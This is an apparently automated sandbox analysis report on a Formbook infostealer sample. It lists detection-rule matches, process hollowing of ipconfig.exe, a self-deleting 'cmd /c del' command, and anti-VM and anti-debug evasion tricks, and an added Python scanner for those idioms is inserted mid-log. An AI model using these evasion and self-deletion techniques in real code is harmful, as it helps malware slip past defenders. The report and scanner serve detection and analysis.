          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@16/8
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: v8kZUFgdD4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\ipconfig.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\ipconfig.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: v8kZUFgdD4.exe | Virustotal: Detection: 38%
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | File read: C:\Users\user\Desktop\v8kZUFgdD4.exe
          Source: unknown | Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Unpacked PE file: 1.2.v8kZUFgdD4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 0_2_00403DDB LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_004062F6 pushfd ; ret 1_2_004062F7
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041B3C5 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_004153FC push eax; retf 1_2_0041540B
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041B47C push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041B412 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041B41B push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00415CE7 pushad ; ret 1_2_00415D4B
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041C4EE push 133511A3h; retf 1_2_0041C4F3
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00414D71 push ss; iretd 1_2_00414D72
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00415D38 pushad ; ret 1_2_00415D4B
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00AAD0D1 push ecx; ret 1_2_00AAD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_0360D0D1 push ecx; ret 7_2_0360D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EA62F6 pushfd ; ret 7_2_00EA62F7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB53FC push eax; retf 7_2_00EB540B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBB3C5 push eax; ret 7_2_00EBB418
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBC4EE push 133511A3h; retf 7_2_00EBC4F3
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB5CE7 pushad ; ret 7_2_00EB5D4B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBB47C push eax; ret 7_2_00EBB482
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBB41B push eax; ret 7_2_00EBB482
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBB412 push eax; ret 7_2_00EBB418
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB4D71 push ss; iretd 7_2_00EB4D72
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB5D38 pushad ; ret 7_2_00EB5D4B

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000EA85F4 second address: 0000000000EA85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000EA898E second address: 0000000000EA8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
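The push/ret entries in the code-function list further above, the RDTSC interceptor lines just above (six bytes between the first and second rdtsc: rdtsc, xor ecx, ecx, add ecx, eax, rdtsc) and the mov eax, dword ptr fs:[00000030h] reads listed later in this section are the same three idioms seen from the byte level: a push followed by a return is a computed jump that hides control flow from a linear disassembler, two rdtsc reads a few instructions apart give the elapsed cycle count that a hypervisor or a single-stepping debugger inflates, and fs:[30h] is the 32-bit PEB, reached without any API call. Below is an added example, not code from the report or from Joe Sandbox, that scans a raw code blob for all three and resolves the target of a push imm32; ret. Opcode encodings are standard 32-bit x86; the sample buffer is constructed for the example, with its first entry placed at 00EBC4EE so it matches the push 133511A3h; retf entry above.

```python
"""
Byte-level scanner for the three anti-analysis idioms the signature lines
describe: push/ret control-flow obfuscation, the back-to-back RDTSC pair used
for timing checks, and PEB access through mov r32, fs:[30h]. It also resolves
the jump target of a "push imm32; ret".

Added example, not part of the report. Opcode encodings are standard 32-bit
x86; the sample buffer is constructed here and only its first entry mirrors
an address from the report (push 133511A3h at 00EBC4EE). The scan tries every
byte offset, like a YARA rule would, so on real code it can also fire inside
immediates or data; confirm hits in a disassembler.
"""
from dataclasses import dataclass
from typing import Callable, List, Optional

OP_RDTSC = b"\x0f\x31"
XOR_ECX_ECX = (b"\x33\xc9", b"\x31\xc9")      # both assembler encodings
ADD_ECX_EAX = (b"\x03\xc8", b"\x01\xc1")
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RETS = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCF: "iretd"}
SINGLE_PUSH = {0x9C: "pushfd", 0x60: "pushad", 0x16: "push ss"}


@dataclass
class Hit:
    va: int
    idiom: str
    detail: str


def _ret_name(code: bytes, i: int) -> Optional[str]:
    return RETS.get(code[i]) if i < len(code) else None


def _push_ret(code: bytes, i: int, va: int) -> Optional[Hit]:
    op = code[i]
    if op == 0x68 and i + 5 < len(code):                   # push imm32
        target = int.from_bytes(code[i + 1:i + 5], "little")
        ret = _ret_name(code, i + 5)
        if ret:
            return Hit(va, "push/ret", f"push {target:08X}h; {ret} (jumps to {target:08X})")
    name = f"push {REG32[op - 0x50]}" if 0x50 <= op <= 0x57 else SINGLE_PUSH.get(op)
    if name:
        ret = _ret_name(code, i + 1)
        if ret:
            return Hit(va, "push/ret", f"{name}; {ret}")
    return None


def _rdtsc_pair(code: bytes, i: int, va: int) -> Optional[Hit]:
    # rdtsc ; xor ecx, ecx ; add ecx, eax ; rdtsc -- the six bytes between the
    # "First address" and "second address" of the interceptor lines above
    if (code[i:i + 2] == OP_RDTSC and code[i + 2:i + 4] in XOR_ECX_ECX
            and code[i + 4:i + 6] in ADD_ECX_EAX and code[i + 6:i + 8] == OP_RDTSC):
        return Hit(va, "rdtsc-pair", f"first rdtsc at {va:08X}, second at {va + 6:08X}")
    return None


def _peb_read(code: bytes, i: int, va: int) -> Optional[Hit]:
    if code[i] != 0x64:                                    # fs: segment override
        return None
    if code[i + 1:i + 6] == b"\xa1\x30\x00\x00\x00":      # short form, eax only
        return Hit(va, "peb-read", "mov eax, dword ptr fs:[30h]")
    if code[i + 1:i + 2] == b"\x8b" and code[i + 3:i + 7] == b"\x30\x00\x00\x00":
        modrm = code[i + 2]
        if modrm & 0xC7 == 0x05:                           # mod=00, rm=101: [disp32]
            return Hit(va, "peb-read", f"mov {REG32[(modrm >> 3) & 7]}, dword ptr fs:[30h]")
    return None


PROBES: List[Callable[[bytes, int, int], Optional[Hit]]] = [_push_ret, _rdtsc_pair, _peb_read]


def scan(code: bytes, base: int) -> List[Hit]:
    """Return every idiom found in code, which is assumed to be mapped at base."""
    hits: List[Hit] = []
    for i in range(len(code)):
        for probe in PROBES:
            hit = probe(code, i, base + i)
            if hit:
                hits.append(hit)
    return hits


# Constructed sample at a base chosen so the first entry lands at 00EBC4EE.
BASE = 0x00EBC4E0
SAMPLE = (
    b"\x90" * 14
    + b"\x68\xa3\x11\x35\x13\xcb"                  # push 133511A3h ; retf
    + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"          # rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc
    + b"\x64\xa1\x30\x00\x00\x00"                  # mov eax, fs:[30h]
    + b"\x64\x8b\x0d\x30\x00\x00\x00"              # mov ecx, fs:[30h]
    + b"\x50\xc3"                                  # push eax ; ret
)

if __name__ == "__main__":
    for hit in scan(SAMPLE, BASE):
        print(f"{hit.va:08X}  {hit.idiom:10s} {hit.detail}")
```

Run it against a dumped section of the hollowed ipconfig.exe (the report's process 7) rather than the file on disk: the idioms live in the injected code, which only exists in memory. A push reg; ret hit tells you the target is computed at run time, so the address has to come from a debugger or emulator; a push imm32; ret hit gives the target directly and is worth checking against the section bounds, since the retf variant listed above pops a selector as well and would fault if reached as written.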
          Source: C:\Windows\explorer.exe TID: 1536 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6904 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.359944939.000000000868E000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379240198.00000000045BE000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00409B30 LdrLoadDll, 1_2_00409B30
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00403DDB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_021C06DA mov eax, dword ptr fs:[00000030h] 0_2_021C06DA
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_021C0A1C mov eax, dword ptr fs:[00000030h] 0_2_021C0A1C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_021C09DE mov eax, dword ptr fs:[00000030h] 0_2_021C09DE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_021C099F mov eax, dword ptr fs:[00000030h] 0_2_021C099F
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_021C08EE mov eax, dword ptr fs:[00000030h] 0_2_021C08EE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A990AF mov eax, dword ptr fs:[00000030h] 1_2_00A990AF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h] 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h] 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h] 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h] 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h] 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h] 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A8F0BF mov ecx, dword ptr fs:[00000030h] 1_2_00A8F0BF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A8F0BF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A8F0BF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A59080 mov eax, dword ptr fs:[00000030h] 1_2_00A59080
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h] 1_2_00AD3884
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h] 1_2_00AD3884
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00A558EC mov eax, dword ptr fs:[00000030h] 1_2_00A558EC
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00AEB8D0
